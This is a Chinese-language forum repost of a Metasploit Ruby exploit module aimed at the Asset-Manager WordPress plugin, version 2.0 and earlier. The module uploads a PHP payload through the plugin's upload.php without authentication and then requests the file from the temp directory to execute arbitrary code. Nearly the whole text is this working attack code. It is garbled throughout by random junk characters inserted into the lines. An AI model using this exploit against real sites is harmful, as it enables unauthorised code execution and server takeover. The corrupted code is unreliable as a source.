这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
$ L4 {/ W) g2 C2 d5 s
6 C* P! x5 c# e8 {3 d$ h##
/ C8 ]1 C: J% L+ u6 |7 r# This file is part of the Metasploit Framework and may be subject to
2 i) F: {( U0 q7 k# redistribution and commercial restrictions. Please see the Metasploit+ V/ h+ x6 j: r
# Framework web site for more information on licensing and terms of use.
0 W* o: x6 y+ u* R+ t# http://metasploit.com/framework/% a3 L7 h4 |4 P' Q
##& I" F2 y5 w, F7 |
: N1 `3 c1 Y6 A- g/ ] Mrequire 'msf/core'
: d- e! v3 [% _8 e! Y& xrequire 'msf/core/exploit/php_exe'7 O5 L/ }4 f% t: O
( W7 S, u! I9 X: }
class Metasploit3 < Msf::Exploit::Remote
1 S6 K4 o Z; o, h1 w Rank = ExcellentRanking
7 D9 G$ n* K5 U
, d0 ]% N1 Z5 V include Msf::Exploit::Remote::HttpClient
, c! _( G8 U z3 x include Msf::Exploit: hpEXE
$ d6 ^; p f5 K% _* u: l
' _! x- ^" s( O5 v4 o def initialize(info = {})5 O' k1 g" i. H* ]
super(update_info(info,* ^; C. |* V+ ?) h4 }/ I( ?0 K
'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
2 X8 j [9 _& A% C. x' B; N 'Description' => %q{. n- |- ^" e. r9 `- C' ?# B& k4 Z. H2 L
This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress4 A( D) j* e$ w. U
plugin. By abusing the upload.php file, a malicious user can upload a file to a
4 y# v" H1 T; N2 h6 h temp directory without authentication, which results in arbitrary code execution.
7 e* I( l% @( f: k5 x$ C* o9 R( A },
6 D! X: a& b8 @9 _$ X, b% [ 'Author' =>. \2 _8 J) m( Z
[0 R" c7 e( T+ I: W0 o
'Sammy FORGIT', # initial discovery
9 Q. Q6 L1 S) E" g' @7 p 'James Fitts <fitts.james[at]gmail.com>' # metasploit module2 u- t! {% V* i Z X
],
. f+ ^9 L; ?( L0 R7 D 'License' => MSF_LICENSE,
* j" r9 J: P! i8 d2 i8 W1 L. P 'References' =>0 m/ x# u+ |& O; a" s4 F
[
$ O8 C+ B- K8 j [ 'OSVDB', '82653' ],- p1 Y; w! i2 U% ~4 w+ G' E& Y$ w
[ 'BID', '53809' ],
$ A. R2 S4 F8 e [ 'EDB', '18993' ],7 v+ t' H1 l; {
[ 'URL', 'http:// www.myhack58.com /' ]
5 V2 m7 R, ], [) ~( G3 }" V. x# ] ],, l" Q' H5 X. f4 P
'Payload' =>
8 `- w! B7 G9 ^ {+ T' C2 l1 M+ \0 S/ K" Z7 e
'BadChars' => "\x00", D8 J/ T% ?* T' W5 w# }7 u$ M1 ^
},. a9 g9 @5 ?" B8 y6 c
'Platform' => 'php',! z, c8 O7 h6 m6 h
'Arch' => ARCH_PHP,9 J# N( K1 l% \7 M: Z
'Targets' =>4 X6 ]7 W4 _8 z1 O+ ]% d6 D
[
$ c6 m8 d$ b D+ g/ b [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],' ]$ ` H1 V E7 F* K) Y0 l! x
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
" R! @' [* `- }; _$ n* m ],) @% {7 ~) v8 i# d3 W' c
'DefaultTarget' => 0,6 D) o: m2 ~% n) L2 G3 K
'DisclosureDate' => 'May 26 2012'))2 s. M+ _. I) g2 f7 m+ V, o
# Y& k5 R, L( u! A% p6 j+ Q
register_options( p# H7 t/ h: N% x: C9 ~# Z* y, U
[) d4 [% a7 a" J9 y" r
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
' [0 w/ K6 \! H g4 k6 b# P ], self.class)
$ Y6 b1 U. O2 ~ end* n3 E+ S h1 G8 s
: \4 U. o2 K; {" ?; R9 H* ]/ j
def exploit
. M" |4 {. S4 e3 n uri = target_uri.path& V. _ g. c, V' R2 i
uri << '/' if uri[-1,1] != '/'6 |7 m2 K$ L6 ]1 z/ ^' S
peer = "#{rhost}:#{rport}"
0 R Q& |( k6 K$ T4 X4 P% _2 w+ Z1 D) F payload_name = "#{rand_text_alpha(5)}.php"
# e; v" l( K: G/ F$ m0 {6 x/ R php_payload = get_write_exec_payload(:unlink_self=>true)
& F7 H" [, o) n# F( j$ q ) x7 V( N5 O: a: a# ` d
data = Rex::MIME::Message.new
( h s) h/ m% j$ Y) B2 M data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")0 b6 S; j9 F9 e3 `3 g
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_') m, E! s9 n# C U6 _
$ M B c, p; m7 o print_status("#{peer} - Uploading payload #{payload_name}")
4 a. m& @8 T/ a: x/ s res = send_request_cgi({+ O. i# x% E3 F* C# y
'method' => 'POST',0 o; G4 x, N m7 W% A( y2 R. V/ u* [8 I
'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",. u1 ]1 j+ k8 i" I X1 z
'ctype' => "multipart/form-data; boundary=#{data.bound}",1 L9 o: Y" s9 s9 N! W& Z$ V
'data' => post_data3 h+ X$ T% f2 R4 g' l0 m
})8 o. G% C. ?. ~( r. [: f
% ^3 a3 g" Z+ [$ K
if not res or res.code != 200 or res.body !~ /#{payload_name}/
/ O5 C0 C5 p& L: c1 B) F5 @ fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")3 M e' Z2 S+ W) Y0 g
end4 k. |" Q% e5 |, c6 |. t
/ J$ |: L- V. m! A+ J$ q
print_status("#{peer} - Executing payload #{payload_name}")
5 O3 B) n! j) q @0 ?4 v2 l4 d res = send_request_raw({. o, A% [, {( G
'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}"," D& G' \3 F& \4 H: f# j
'method' => 'GET'
2 E2 S0 A9 e! n: K- o& q; C3 A+ ~ })4 d* o0 N" F# B* Y& h% a7 I
5 l$ ^0 Z9 k1 ?( |
if res and res.code != 2002 A0 D( m# S1 `
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
# {- V8 d' V7 Q end% P' L7 V, ^* O
end
) ] B% v4 c% `# X7 C$ cend
' P4 m/ [# X' @% H9 ^- S' S |